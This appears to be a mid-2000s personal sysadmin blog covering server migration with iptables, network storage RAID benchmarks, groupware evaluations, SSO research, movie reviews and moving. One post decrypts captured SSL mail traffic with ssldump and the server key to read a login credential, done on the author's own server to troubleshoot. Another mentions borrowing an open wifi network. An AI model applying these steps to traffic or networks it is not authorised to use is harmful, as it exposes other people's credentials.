iptables -t nat -A PREROUTING -p tcp --dport 80 -i eth0 -j DNAT --to 5.6.7.8:80
iptables -t nat -A PREROUTING -p tcp --dport 443 -i eth0 -j DNAT --to 5.6.7.8:443
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

As soon as you run these commands, all connections are transparently sent to the new server. Just keep this on until there are no more requests coming to the old server.

I setup a Idotpc Ibox Crystal P4c small form factor PC with a Sangoma card and made it our T1 router through Bellsouth.

The PC is a 2.4gz Celeron with 1 gig RAM and 40 gig HD. It costs $500 and was the cheapest small form factor PC I found for the specs. Another $500 went to the T1 card, so for roughly $1k you have a Linux router. The Sangoma was not too difficult to setup. I had some hiccups using the 'stable' driver with Debian Woody, and was told by tech support to use the beta instead. That worked fine.

The small PC is rather nice looking, and has a purple light that looks cool in the dark. This is our first step at moving core services to small form factor PCs. We also plan to test a Mac Mini Debian server.

Contrast this with the monstrosity that is the Dell Poweredge 2800. We received one of these and when I saw the box on a wooden crate, I said WTF. Since when have Dell tower servers become so ridiculously large? The depth is 28 inches and it weighs 108 pounds!

Such big iron systems are becoming less and less appealing to me.

Today I installed 10 Hitachi Deskstar 120gig HDs into a Coraid box. My prediction was pretty much correct. I've setup the drives in a RAID 1+0 setup, where 5 pairs of mirrors are striped. I'm seeing about 24 MB/sec read, and 30 MB/sec write. Checkout the bonnie output.

The Daily Show mentioned a website that lists the worst things on TV. I had to check these out .

A friend sent me a link to someone criticizing Hula. He claims group calendaring should get people laid.

Came across the Hula project on Slashdot. This is an email and calendaring server that is striving to have a Gmail-like interface. The developers seem very optimistic.

I decided to download it to check it out. I have a CentOS 3.4 box at home, and installation was not too difficult. I was able to get it up an running to check out its webmail interface. Some notes:

• Download and install Subversion. Do a svn checkout as described on the Hula page
• Install the kernel-source RPM
• Because of some problems finding the atomic_ kernel functions, you need to do some trickery:

mv /usr/include/asm/atomic.h{,.old}
cp /usr/src/linux/include/asm/atomic.h /usr/include/asm/

• Configure with the following:

CPPFLAGS=-I/usr/kerberos/include ./configure --prefix=/opt/hula

The rest of the instructions should be fine. The system is definitely not ready for prime time, but it's cool to checkout. I hope it moves forward.

Google's front page links to a Valentine's Day search. Am I the only one who finds it hilarious that the first link has the text "Watch The St. Valentine's Day Massacre"? lol...

There's a very interesting article in the Feb 2005 issue of SysAdmin magazine titled Next Generation DHCP Deployments. Unfortunately the article is not available online.

It describes University of Kansas' DHCP setup, which has to deal with any crazy student plugging in their virus-laden PC into their network. They designed a very ingenious system that does many things. First off it does passive OS fingerprinting by looking at the DHCP request sent by a device. It turns out every device/OS sends a unique DHCP request packet with certain options sent. They've built a database of every possible device, from Linksys routers to Windows versions. They can deny/accept requests based on this data.

Another cool thing is they tag the DHCP request with VLAN information and are able to determine where exactly the device is. This lets them quickly track down security problems, and can be used to stop people from installing a hub at the network port connecting many systems to it.

So what about rogue DHCP servers that someone decides to setup? Well the network switches are configured to only allow a certain trusted port to send DHCP responses. Hmm, but I still don't understand how they handle systems setup with a static IP.

Anyhow, it reminded me of how much different it is working as sysadmin in a university. The problems there seem alot more grand than the problems at a small company, and the solutions are grand as well.

I heard a pretty cool cover of Britney Spears' Toxic on the radio by Local H. Searched on Itunes for it but wasn't there. Then I found it was downloadable as an MP3 from their site. Check it out, it's Nirvana doing Toxic . It sounds alot better than the original.

The latest update to the Linux on Mac Mini page informed me of how to burn ISO images in OS X. I have been normally using cdrecord, which has been giving me coasters unless I set the recording speed to 8. I wondered if there was a way to burn ISOs without cdrecord, and in fact there is. Disk Utility allows you to do it!

We received a Coraid shelf at work for some testing. I was always interested in testing out this system. The cost savings of being able to use commodity hard drives easily attachable to the network was very appealing. Here are my experiences with the product.

My main objective was to guage performance with software RAID and test failure scenarios. Each drive has an 100mb ethernet port. I was hoping for gigabit, but oh well. The preferred setup is to connect all drives to a separate switch with a gigabit uplink to the server. This way the aggregate throughput can scale well, and it seems to.

The Linux driver is very clean, and as you plug in new drives, they are automatically detected. On my 2.4 kernel, I get the found drives listed in /dev/etherd/stat:

/dev/etherd/e0.3 eth1 up
/dev/etherd/e0.1 eth1 up
/dev/etherd/e0.0 eth1 up
/dev/etherd/e0.2 eth1 up

Then you just use those devices just like hard drives. It is pretty amazing, and I'm impressed with how easy it was to get up and going. Now for the performance tests.

The max throughput in my tests to a specific drive, both read and write, was about 5 MB/sec. For a hard drive this is very slow, so RAID needs to be used to get more speed.

Using simple RAID 0 (striping across drives) results in the best speeds, but of course there is no redundancy. In such a case, the system seemed to scale well. I tested with 4 40gig hard drives, and my throughput, both and read and write, was about 20 MB/sec.

As expected, RAID 1 gives less than stellar performance. About 5 MB/sec read, and 5 MB/sec write when using 2 drives.

With RAID 5, I ran into lots of problems. In the 4 disk scenario, I got 20 MB/sec read, and 1 MB/sec write. Yes, that's 1 MB/sec. What is also wierd is a 3 disk RAID 5 did its resync at 1 MB/sec, whereas a 4 disk RAID 5 resync'ed at 3.5 MB/sec. I am still not sure what's going on here, but it appears to be something with the Linux RAID software or my CPU. I know that RAID 5 involves lots of XORing, and it is almost like this is CPU bound on my system (Dell Poweredge 1650 P3 1gz).

Thinking about this more, RAID 5 is not very appealing. I don't trust the rebuild times. Also if 2 drives die, you are dead. Next I tested RAID 1+0, which doesn't have these limitations. Well it does, but there is less chance of complete failure. This seems to be the best choice for us. With my 4 40 gig HDs, with RAID 1 across 2 drives, and RAID 0 across the 2 pairs, I see about 10 MB/sec both read and write. Now we are getting somewhere. I'm guessing this will continue to scale. We have ordered 10 120gig drives to put in the box, and if my predictions are right, I should see about 20-25 MB/sec. I plan to use this for a mail server, and I would consider those rates acceptable.

The system shelf is rather bare. Don't expect visual appeal like an IBM or Dell system. The shelf is smaller than it looks, which is good for us because we don't have much space. The blades are bare circuit boards, rather tough to get a grip and slide out when the drive is attached, and when the system is live I do sometimes wonder if I'll get shocked hot swapping them .

The technical support is very good. They are the ones who wrote the ATA over Ethernet driver, and I hear it is in the latest 2.6 kernels.

Well it looks like the fix I made was actually implemented in Communigate, so my script will soon go into my museum of dead code. There must have been other users requesting this:

* HTTP: the CalendarDataDel realm is supported now (same as the CalendarData realm, but PUT operations delete all existing iCalendar items first).

Well was fun to work on either way, and this fix is not in the stable release of Communigate yet.

I had some questions for the Mozilla Calendar development group. I posted a message to the newsgroup but didn't get any response. I did some research and found this bug which doesn't appear to have been updated in over 6 months. I decided to send an email to the email address the bug is assigned to, which is supposedly the Mozilla Calendar development group. I got an undeliverable message back about the account not existing . I even sent an email to the QA contact but he stated he is not part of that group.

As my message stated, I've been having ideas of adding code to Mozilla Calendar/Sunbird to store data in IMAP. It seems a large undertaking but it seems at least a few people are interested in developing this. However, it is not clear whether this is a good idea or not. Mark Crispin of UW IMAP tells me:

Basically, IMAP was designed for messaging, not calendaring; so it lacks tools which are needed for calendaring, and tools which could be used for calendaring aren't quite right.

There is a working group at IETF that is working on calendaring.  They haven't progressed very well, and I suspect that if we try to duplicate their work in IMAP we may have the same problems.

None of this is intended to discourage you from developing calendaring in IMAP.  Rather, I'm just sounding some notes of caution.

Good advice. This needs to be thought through. I'm torn between a 'build it and they will come' attitude verses wait until something else comes along. But judging from my research so far, robust calendaring seems to be at a standstill.

Update: I found this blog which decribes the future of Sunbird. It looks like they are going towards CalDev as the standard.

Dealing with groupware calendaring issues has been taking alot of my time. I usually like to do some programming every now and then to sharpen my skills. Programming to me falls under the use it or lose it category. I work on small projects occasionally as you can see from my home page, and needed to work on something new. It's sort of a catharsis for me .

Python is my language of choice these days. The language never ceases to amaze me. It's just beautiful and simple. I've noticed that the end result usually has less bugs than something I've written in other languages.

So, during my tests of group calendaring and Mozilla Sunbird, I found out that when used with the Communigate Pro mail server, deleting calendar events on a remote calendar does not work. It has to do with Sunbird issuing a HTTP PUT for its calendar data, and Communigate assuming this to be an append of data, rather than a replace.

Mozilla 'shared' calendaring in its current state is a complete hack that is not scalable at all. It involes first retrieving the whole calendar from a server, making a change, and then posting the whole calendar back to the server. Think about if you have a large calendar with 1meg of data. This gets extremely slow and inefficient.

Regardless, I wanted to get Sunbird working with Communigate. I looked at the available operations on CG's calendar interface, and realized what I need to do is convert the HTTP PUT from Sunbird into a combination of a HTTP DELETE and HTTP PUT. So began the idea of my next script.

It took me about 5 hours to make a multithreaded HTTP proxy to do this in Python. If you examine the code, you will see just how simple this is. Python includes a HTTP server class that is easily extended, and I got alot of help from the excellent book Foundations of Python Network Programming. What's also amazing is to make it multithreaded, I just needed to inherit a threading class! Nothing else at all, it just works!

I'll spare the details, but one thing I especially liked was this line of code:

self.respond_client(*self.cg_request('GET'))

This is the implementation of the GET request. It's a strange syntax, but here is what it's doing. respond_client() needs to have 2 arguments passed to it. cg_request() returns a tuple with 2 values. A tuple is essentially a read-only list. The * prepended to the function call makes the tuple expand into function arguments. Amazing I tell you!

It seems I'm digging myself deeper and deeper into group calendaring. Pete pointed out this interesting article, and we talked about an idea of getting Sunbird to store entries via IMAP in this iMIP format. The difficulty level of this looks to be high, but man it would be cool. I'm reading up on XUL now.

I posted the following on the Mozilla forum:

Proposal for Sunbird to support iMIP for calendar storage

As described here and other places, I think that it would be great if storage of calendar entries can be done on an IMAP folder.

Communigate Pro seems to do this internally, storing in the iMIP format. Essentially each calendar entry is a mail message in a folder. They implement a MAPI connector for Outlook that works over IMAP to access the calendar.

When deleting entries, just the one message is deleted. Assuming storage is maildir, this works pretty well. Likewise, additions just add one message. This seems alot better than downloading the whole calendar in iCal format, making a change, and posting the whole calendar back. I've run into slowness problems with large calendars.

What's great about this is if Sunbird could speak IMAP and use this storage, it would interoperate with Communigate's own web calendaring, and also could be used by any IMAP server. It seems standard and open enough that other clients would be able to work with it.

Does anyone have thoughts on this? Any plans to implement this currently in Sunbird? I would honestly like to embark on such a project, but I don't know too much about the Mozilla platform. If someone could provide some pointers on where I could start that would be great.

Today it was pretty much decided at work that we want to move away from Outlook. I had originally been looking into MAPI interfaces for Outlook, and doing testing with Communigate. However, it was brought up that if we implement tight integration with Outlook we would become dependent on it. Better to cut the umbilical cord sooner than later.

Our idea is to instead go with Mozilla Thunderbird for mail via IMAP and Sunbird for calendaring. We would decouple calendaring from mail. Contacts would be done via LDAP. There are alot of issues to consider, but the main ones are offline support and shared calendaring.

Thunderbird with IMAP will work fine for mail. I'm just not sure of the offline support. It is there, but you basically mark which folders you want to have available offline and it seems like you need to synchronize mail before going offline. I just know this may be problematic for users.

Sunbird can work off of a remote calendar as described here. With Communigate you can implement access restrictions to your calendar that a group of users could read/write to. This implements a basic shared calendar with delegation. Since these are just ical files, Communigate's web interface can also be used to access the calendar. This is very cool. You could most likely do this all without Communigate, but CG just makes it easier.

So what you have with the above setup is a calendar that others can access. Before you add a calendar entry in Sunbird, it first downloads your calendar from the server, makes the change, then posts it back. The one problem I have is it is prompting for the login information every time Sunbird starts and there is no option to save the password. It seems you can use a http://user:\pass@... format for the URL to post, but this seems rather scary to have your password cleartext. Other than that it seems to work well, but I'm not sure how this will work if someone has a very large calendar. Presumably the ical data is small.

The real problem is doing this offline. Sunbird appears to attempt retrieving the calendar from the server before you can make a change. It essentially ignores anything you do offline. It doesn't hang in OS X, but I've heard it does in Windows. It would be nice to configure it to allow some sort of offline editing.

I thought of even reading up on XUL and possibly coding something up that would attempt to post the local calendar every X minutes, ignoring errors, instead of first attempting to retrieve the remote one first.

So in a nutshell the problems are:

• Thunderbird requiring user intervention for synchronizing folders for offline work
• Sunbird prompting for login information at startup for remote calendar
• Sunbird not able to work offline with remote calendar

I would love to go to a standard format and ditch Outlook. If everyone's data is stored in these formats, it will be much easier to code up scripts to implement any other needs as they arise (meeting scheduling, etc). But it will be an uphill battle for sure.

I came across the above article in Discover magazine about how anyone can be a producer/musician these days. It praised Garageband, a music orchestration program that comes with OS X.

Now I've always seen that little guitar on my Powerbook's dock, but I've never clicked it before. After reading the article, I thought I'd try it out.

I am amazed. The program makes it extremely simple to create music, and good quality music at that. It comes with drum loops, intruments, bass lines, guitar riffs, etc and the interface is unbelievable intuitive.

Now some background here, I used to work alot with electronic keyboards, mostly doing sampling and hiphop music. I spent years doing that, cutting up samples, creating drum beats, working with some would-be artists, going to studios, etc. It was fun, but I stopped when most of my friends went elsewhere and I started a real job. Nowadays the field is saturated with producers, and my god, the equipment these days... you need alot more money now to make good music.

I spent about an hour in Garageband and did what would take me 2 days to do on a sampling workstation/keyboard. The ease that you can manipulate waveforms, create loops, arrange and move them in your sequence (in real time!) is awesome. It almost makes me want to get back into music again.

This weekend I checked out Clint Eastwood's Million Dollar Baby. I've liked the films he's directed and they all are very intelligent.

This movie has Hilary Swank training to be a boxer, and she does awesome. Her Oscar nomination for this is well-deserved. Eastwood plays her trainer, and he does great as well.

Spoiler alert...

Oscar nods seem to always include a movie where someone dies on a deathbed. Well this boxer does die, and goes through a very sad sequence of events before she does so.

The boxer gets blindsided with an illegal punch that causes her to fall on a stool in the ring and break her neck, rendering her paralyzed from the neck down. Most movies at this point would show a person rehabilitating and triumphing over the disaster. In fact when I first saw it, I thought, no way, she is just getting started on her championship, this can't stop her. Wrong...

Eastwood movies have characters battling inner demons, and I thought the conversations between Eastwood and the priest were very interesting. The priest considers him a pagan, but in reality he is very spiritual. The movie eventually comes down to a euthanasia question. The priest says it is a sin to kill, but it's argued that it's a sin to keep the person living in such a state. She suffers so much that she attempts to bite off her tongue to bleed to death. It's a grueling scene.

The boxing scenes were top notch, and I was reminded of Scorsese's Raging Bull. It's a very sad movie, but if you can take it, go see it.

I'm currently testing Communigate Pro as a groupware solution. I've had great experience with it in the past. It's solid, stable, uses open standards, and painless to maintain. There is really nothing that comes close to its administration interface and it has a very nice filter plugin interface.

They have a MAPI plugin for Outlook which I had issues with in the past, but I'm hoping that it's much better now. What's very cool is it basically converts MAPI to IMAP, and stores things such as calendar items in standard ical format. They make a good effort to be cross-platform.

One issue that came up in the past were offline synchronization. I'm doing tests with a 2 gig PST file converted to MAPI, so we'll see how it goes.

Another was its web interface, which is extremely bare-bones. It works, but is just ugly. I did some searching and found this post about some nice skins. Personally I like the Rapsberry OSX theme the best.

I've setup a new blog for a buddy of mine Scott Illsley whom I used to work with. Check it out.

I've been evaluating Scalix at work as an Exchange replacement. The system is based on HP Openmail, which in my opinion is a piece of junk. Everything is stored in a proprietary format that is impossible to debug when there are problems.

One of the main selling points of Scalix is the web interface. This is supposed to rival Exchange's webmail, but seems a very clumsy interface to me. It's missing key features such as free/busy checking, not being able to create shared folders (needs to be done via Outlook), and no addressbook links when composing messages. It gave the impression of a hack job

I played with the Outlook plugin, and certain public folders I created in Outlook wouldn't show up in the web interface. Other than that it seemed to work ok.

After installation, I had to change my hostname. Well Scalix did not like this at all and failed to find the 'mailnode' when adding users afterwards. It was non-intuitive what I needed to do to fix it, and my only solution was to completely re-install it. After that, I was even able to hang the Scalix server when I tried using Thunderbird with IMAP. Just pathetic.

Then there is the "admin" interface, which after you have seen Communigate Pro's, is lacking in many respects. It's just a simple user manager.. no server configuration at all.

The web interface requires Java and Tomcat/Jakarta on the server, and as with all Java crap there is version hell. I went through a few hours trying to get the right combinations of versions of Java and Tomcat that would work with Scalix.

When using offline sync'ing to Outlook, you are limited to 2GB in Scalix. So you can continue doing your maintenance of keeping users under 2GB. Yippeee.

I just could never see myself maintaining this in a production environment. The system is too complex and closed. Why the hell did they choose Openmail instead of the countless quality free mail servers out there?

It's sad that there is no good Exchange killer out there. This problem seems never ending. I would love to use Thunderbird and Sunbird for shared calendaring, but it is missing any concept of meeting scheduling (availability, accepting/rejecting meetings, etc).

I really admire OS X Server. This is a bundle of free software that works (Postfix, OpenLDAP, Cyrus, Apache), but where is the Exchange killer? How do people at Apple schedule meetings?

I've been using Ubuntu Linux on my home desktop for a few weeks. I like it very much, mainly because it is less of a moving target than Debian Testing. The forum support is very good, and I even got help on an issue I had.

I hadn't booted Windows in awhile, and this evening I attempted to. Lo and behold the boot loader appeared to hang. I thought my XP partition was hosed. In Linux, I was able to mount and read the NTFS partitions just fine, but it just wouldn't boot. I did alot of searching, attempted XP's fixmbr, reloading grub, etc all with no luck. I finally started a Recovery Installation of XP.

During the recovery install I did more searching and eventually found this post on the Ubuntu forum, which in turn pointed to this article. The first reboot of recovery install was attempted, and XP wouldn't boot!

So I tried what was explained in the above pages. I booted a rescue disk and did:

sfdisk -d /dev/hda | sfdisk --no-reread -H255 /dev/hda

After that, booting continued the 2nd stage of the recovery install. Long story short, my partition table was hosed. I could have just run the above command to fix it, but now I'm sitting through an XP install .

In case you want to do some Python scripting on MS Access databases, this link explains a bit how. It works very nicely, but you have to install the pywin32 package.

I had a chance to check this out after hearing good reviews about it. It's essentially a journey of a man going mad. When I first heard Sean Penn's character introduce himself as Sam, I thought oh no, can it be this Sam? Fortunately not. I honestly could not watch more than 5 minutes of I am Sam due to being supremely annoyed by Penn.

He was very convincing in this movie, which is ultimately a character study. It's reminiscent of Taxi Driver, and I love such movies. In the end, there is a botched attempt to hijack a plane. It shows Penn reaching his exploding point. He gets in line for the metal detector.. gets scared, leaves, has doubts, then comes back. This scene is actually quite scary, and I couldn't help thinking about September 11. When a person reaches this point, there is no turning back.

At work the IT Director suggested using small form factor PCs for servers. I found this rather intriguing. Think about a stack of cheap brick PCs like the ones sold by Idotpc and Simplified Innovation, instead of a rack full of expensive, large, loud, and hot servers.

Fairly decent brick PCs are running around $500. The storage for such small PCs could be offloaded to a Coraid box. Instead of concentrating on expensive servers, why not make them easily replaceable, such that they can even become almost disposable. Disposable servers... there is something very cool about that .

Maybe even something like a stack of Mac Minis. The only issue is we want to run Linux. We can, but certain support may be lacking. For example, we are using Sangoma T1 cards in Linux boxes. They require a PCI slot and x86. Most likely there is no ATA over Ethernet support on such architectures as well for Coraid.

Could this be the way of the future? Could such small, cheap, and disposable systems replace the monstrous racks of expensive servers?

My new job uses SMTP AUTH over SSL. For some reason Mail.app in OS X was getting authentication errors sending mail. I thought this was maybe a client problem and was busy with other things to look into it. Also I could get by without AUTH just fine. I then switched to Thunderbird and got the same problem. It was beginning to irritate me so I started looking into it further.

I wanted to understand what the client was sending. Normally I could use tcpdump or ethereal, but when the transaction is SSL encrypted it doesn't help much. I did some searching and found ssldump. When given the private SSL key, this can decrypt the packets for you.

I didn't have gcc on OS X, so I couldn't compile ssldump. But I did have tcpdump and ssldump can read pcap files. So I used tcpdump to capture data to a file:

sudo tcpdump -nlp -i en0 -w /tmp/blah.pcap port 25

Then I tried sending mail in Thunderbird. Next I took the blah.pcap file to a Debian box where I installed ssldump (easy as apt-get install ssldump). Then I did:

ssldump -r blah.pcap -k server.key -d

Voila, it got me the AUTH line my mail client was sending. I compared it with the one generated as explained here. Everything looked ok, but the server was rejecting it for some reason.

After further investigation, it turned out there was a misconfiguration on the mail server that was causing this. The steps above helped me rule out a client issue, and ssldump was very helpful.

Well today was my first day at the new company. Things went very smoothly, and everyone is extremely nice and easy to get along with. I work in a group of 6 IT people. I went through alot of orientation, and understanding the network. My first task is to setup Twiki to put alot of server documentation online. That'll most of all help me understand everything. The IT director is encouraging everyone in the group to learn Linux (some have Windows background), signing them up for training, etc. Pretty nice, and I helped one with her regular expression exam. I think she passed.

I was given a 15" Powerbook and also Virtual PC to run Windows on OS X. Virtual PC is pretty nice, but slow of course. It is similar in speed to VMware, and it's good for me to have as a sysadmin in order to diagnose Windows issues. So now I'm staring at 2 Powerbooks on my dining table. I just know one day I'm going to take the wrong one to work .

I started using the OS X Mail client, but didn't quite like it. I thought of maybe installing mutt, but then thought about having to setup fetchmail, making it not fetch when offline, or avoiding a cronjob re-awakening out of sleep. I decided to go with Thunderbird, and it is pretty nice on OS X. On the server end they run Exim, which is something I'll have to learn.

I got in office at about 8:30am and left about 5:30pm. I expect those to be normal hours, for IT at least. In the evening at home I did alot of research on hardware and other work-related stuff. I expect to be doing alot of that, at least in the beginning. Shit, I haven't even finished unpacking.

Today Adelphia came to my place to install a HDTV tuner and cable modem.

First the TV. I have used Voom for awhile, and even though it had tons of HD channels, I had problems with signal quality. Certain scenes that had lots of action going on resulted it pixelation frequently. Also if there were any clouds in the sky I'd get signal cuts. When I heard Adelphia now has HDTV, I figured I would try it. They were offering all premium channels + HDTV + cable modem for $75/month.

I had made things easy for the technician and prewired component and optical cables ready to be plugged into the tuner box. I also learned that it is a PVR as well, and I must say the pausing live TV feature is quite addictive. There are only a few HD channels (HBO, Starz, Showtime), and only the primary channels (no HBO2 etc), but in general I was impressed with the quality. The PVR even works in HD, and changing channels is MUCH faster than satellite. I watched Out of Time tonight to test it. Looked very good (and not a bad movie).

Next was the cable modem. Again I had everything ready, including Windows XP for the clueless tech. He had to do some configuration directly on the box so I had to disconnect my wireless router. After that, I put the router back in, and all worked flawlessly. It is extremely fast. I was playing with Ubuntu Linux and when it was downloading packages I got rates of 256-280 KB/sec! This blows away the DSL I had. One good test is going to a HTTPS page. These always load up dog slow on slow connections (even DSL), but was extremely fast on cable. Very cool!

The apartment is becoming more likable . This morning I reported some issues such as my dishwasher missing the utensil basket, and the front door lock being difficult to use. Within a few hours someone came out with the basket and fixed the lock. Not bad service. Oh and I found a pretty good Chinese and pizza place closeby, so I'm pretty much set .

Between moving and unpacking, I made an effort to go see the movie House of Flying Daggers. This is a beautiful movie. I loved it very much, from the choreography of the fight scenes, the music, and the story. The movie almost makes a 90 degree turn halfway through it. The fight scenes were simply amazing, and very artistic in the Hero sense. They had a scene similar to Crouching Tiger's tree fight, but this one was just much cooler and at least a little more believable (hehe, well not really). Definitely go checkout this movie. It's ultimately a romance, and a great one. It deserves the many awards it won. As usual, I think there were like 4 people in the theatre when I saw it.

I also saw the trailer for Kunk Fu Hustle. From the director of Shaolin Soccer, and it looks awesome.

Well I've successfully moved into my new apartment Saturday morning 1/15/05. That evening I went to a co-worker Dennis' bachelor party. It was pretty fun. First we went to Hard Rock Casino for dinner at a restaraunt there. That place is HUGE. Then of course the strip joint. We were out pretty late, and I didn't want to drive 1 hour home, so I crashed at his place.

So now it is Sunday evening about 11pm. I have no internet access from my apartment, so I went war driving. I'm now sitting in my car outside Panera Bread, getting a weak, but working wifi signal . It's kinda cold also (for Florida at least): about 55 degrees fahrenheit. Tomorrow is a holiday so I start my new job Tuesday. I should hopefully get my cable modem tomorrow.

The apartment is workable, but kinda small for the shit I have. I may look for another sometime later. It should do for now though, at least until I sell my townhouse.

Well I've packed almost everything except for my DSL hardware and laptop. I'm surrounded by boxes. I thought I lived light. It's amazing how much stuff you think you don't have. Things just start creeping up out of nowhere and you're like, "WTF did I buy this?" and "Do I really need this crap?"

What's kinda scary is I have not seen my new place yet . I've only seen it on paper. They didn't have the model available when I was looking, and I never got a chance to drive to Palm Beach Gardens to check it out. So I have movers coming tomorrow morning. I sure hope I like it .

I'm looking forward to it though. I actually like the fact the community has a gym. There is no gym here and I haven't worked out in awhile. I've been reluctant to jog these days due to unleashed mutts.

I decided to go with cable modem for Internet. Adelphia had a good deal: all movie channels with HDTV and high-speed Internet for $75/month. That's a pretty nice deal.

Hopefully my next blog will be from Palm Beach Gardens, probably from an open wireless network somewhere since I don't get cable modem until Monday.

Today was my last day at Z-Kat as a Systems Administrator. I'm moving on to a new job in Palm Beach Gardens. I believe we have found a good replacement for me at Z-Kat, and things should go smoothly.

I was taken out to lunch by a bunch of co-workers to Dave and Buster's. The CFO says to me afterwards, "So this is all a joke right? Ok ok, you got us. You're not leaving right?" Unfortunately no, but he was a cool guy. I played my last game of foosball (and won). I spent all day putting finishing touches on all of the sysadmin documentation I could come up with. I did a bit of cleanup, like killing stray Call of Duty servers . Luckily things are kinda slow right now at Z-Kat, so the new sysadmin should have some time to get up to speed.

I said my goodbye's to everyone. It was a fun time there. It was the first job where I worked mostly with software developers, and can say I learned some cool things. There is also something that I'm taking with me from Z-Kat, that I can never forget.

I've decided to ditch Debian Testing on my home desktop system. Im tired of downloading 200megs of updated packages every time I boot Linux. It was turning out to be very risky, because many times some package would break. I thought it was fun, because I would have the challenge to figure out how to fix it . Tonight I just got fed up. This particular instance resulted in my MySQL database not starting:

Jan 12 22:41:27 localhost mysqld[1607]: 050112 22:41:27 [ERROR] bdb: unable to initialize mutex: Function not implemented
Jan 12 22:41:27 localhost mysqld[1607]: 050112 22:41:27 [ERROR] bdb: process-private: unable to initialize environment lock: Function not implemented

Debian Testing is changing so much it's just not worth it for me. I think Stable is the only one to run, and that is better for servers, not desktops. I'm going to switch to Ubuntu Linux. I've heard good things about it, and it is based on Debian.

This morning I'm sitting at stoplights reading Linux Journal and came across an ad for Coraid, a company making 'Ethernet Disk Drives'. This uses ATA over Ethernet, and currently there are open source drivers for Linux (no Windows it seems). From what I understand, the drives will appear just like normal attached drives on Linux systems. You can then do software RAID, etc, on Linux if needed. Multiple systems can even see the same drives in read-only for backup purposes. There is no TCP/IP overhead, and it seems reasonable that this would work well with a gigabit switch. They even say it works good on 100mb.

It looks like a very cool storage solution, much cheaper than the big SANs. They are addressing users looking for storage without the need for big servers. They use standard IDE drives which can be purchased cheap. Backups would be a cinch with the hot swappable drives.

I've been interviewing candidates at my current job. I recently talked with a recruiter and couldn't believe the fees they charge. Here is a real example.

One candidate wanted a salary of 60k. Through the recruiter, we would pay them $52 per hour. Let's see what this comes out to. Assuming 40 hours a week, 52 weeks per year, this salary would actually be 108k! The recruiting company would make 48k off of this candidate.

That was their first option. The second one was 30% of salary for direct hire. That's 18k initially up front.

What a ripoff! Be careful if you work through a recruiter. Keep in mind how much they are stealing from your salary.

Well I've been slowly doing packing for my move on January 15. My previous mover, Luis Moving, did a pretty good job. They only work in Florida, and were not available for my move date.

I instead selected Nice Jewish Boy Moving . We'll see how they work out. Moving is a bitch. I need to get rid of the junk I have. A friend of mine actually used UPS as a mover. Now that's what I call travelling light.

Meanwhile I have to keep my current home rather clean because realtors come and go during the day. You lose some privacy when your home is on the market. A realtor actually came interested in buying the place for herself, which may be a good sign. I'm hoping to make about 20k on the sale of my place. Not that great, as selling my last home 2 years ago got me 50k. Homes are too overpriced in FL these days, and it is very difficult to determine what will be good investment and what will not.

My webhosting provider does not give shell access, but allows you to use a web interface for various administrative tasks. It has a file manager that is pretty nifty.

I was trying to install Twiki from their zipped distribution, and accidentally unzipped it in my website root. It ended up clobbering my index.html. That zip should really changed to be like their tar, where it creates a subdirectory first. Luckily I had a copy of the index.html somewhere, but my web page was broken for a day before I even noticed it .

Anyhow, I had no luck getting Twiki running because I needed more control of the Apache configuration file. It probably can be done, but I just didn't invest much time in it. Instead I installed Mediawiki. It was a pretty simple install and enough for me. I've kept the wiki private for now, and use it just for some personal notes.

I've been doing some research on Single Sign On (SSO) systems for a possible project at my new job. Such a system lets you login once, and be automatically authenticated for everything else without requiring further passwords. They are also interested in implementing two-factor authentication, such as SecureID.

The most popular system is Kerberos. This is a tried and tested SSO system, and a great introduction is given in this dialogue. Now this all works great with Unix (Linux, OS X), but problems arise when interoperating with Windows.

Now if I were implementing this, I'd want the Kerberos server(s) running on Linux. Windows 2000's Active Directory actually uses Kerberos, but they've added extra things to the protocol that are proprietary that the Unix servers cannot support. Basically, the Windows clients need to have the SID and some sort of certificate for the user logging in, and this is what Microsoft has added to a Kerberos ticket. There are 2 ways you can use Windows with a Unix Kerberos server:

1. Running a Windows Active Directory server and proxying the authentication to a Unix Kerberos server. This essentially involves the AD server trusting the Kerberos realm and accounts existing in the AD.
2. Binding Windows workstations directly to the Kerberos realm. This requires that Windows clients not be part of a domain and that user accounts are pre-created locally on each client system.

Neither of these solutions are very appealing to me, but if I were to choose, I would pick the first method. This is what major universities appear to be doing from what I've read. Samba unfortunately cannot be an Active Directory server yet.

I was kinda excited about Kerberos until I found out these limitations. I started looking at other alternatives, and found pGina. This is a replacement login DLL for Windows systems that has plugins to authentication via many methods, including SecureID. This actually might be the better method for centralized authentication.
However, there is talk of using an Exchange server, and I know that won't play well with this. And really this is not a SSO system like Kerberos, it's just centralized authentication.

Exchange will, however, work fine with Active Directory. And there are many people that have setup Linux systems to authenticate to AD. This would suck, but might be the only other option.

Today I went searching for an apartment. Let's see, where to begin...

The first place I went to was Flagler Pointe. I was very optimistic about seeing this place. Just driving there, along the intracoastal, was beautiful. When I got there, the security guard was much nicer than usual ones, letting me in to park in private covered parking. As I'm walking up to the lobby, I hear some very good piano playing, and when I tell the lobby attendant that I'm here to see Elena (a realtor), he says it's the "beautiful girl playing the piano." All of this got me very excited .

I ended up looking at 4 or 5 units, only one of which I really liked. The main one I was going to see, a 1 BR top floor "penthouse" was too small for me: 863 sq ft. It was overlooking the water, but also a parking lot. They wanted $1300 for it. The one I really liked had a view overlooking the courtyard/pool area AND the intracoastal. It had oak wood living room floor, carpeted bedrooms, upgraded kitchen and appliances. It was VERY beautiful, but too expensive: $1800. So Flagler Pointe was out for me .

I ended up finding a pretty good apartment close to my job. I got a 2 BR, 1300 sq ft for $1200. It's not the greatest place, but still fairly nice. It's called San Merano, and I got the Doral model.

So my selection is done, and hopefully I move in Jan 15. Meanwhile, I've put my townhouse on the market.

With my new job I need to find a place closer to Palm Beach Gardens. I've been looking at some rentals, and originally though of renting out my townhouse in Fort Lauderdale. It turns out there are many units for rent in my neighborhood, and I'd have a tough time competing with them. So now I'm looking to sell. I tried selling awhile back, but did not get any good offers. Time to try again.

Last weekend I did some apartment hunting and considered Legacy Place. That's pretty nice and about 5 minutes away from work.

This weekend I'm planning to look at Flagler Pointe. This is about 20 minutes away from work, but is on the intracoastal and looks very nice. Another one is Park Place, a bit west, and about 15 minutes away from work. Finally, there is the not-so-exciting Mira Flores Apartments, which is about 5 minutes away from work.

Ideally I'd like to move before I start work. But this is risky. If I don't sell my townhouse, I will be stuck with paying for 2 places. If I don't move, I'll be driving 1 hour every morning from Fort Lauderdale (with a leased car even). Neither of these are very good scenarios.

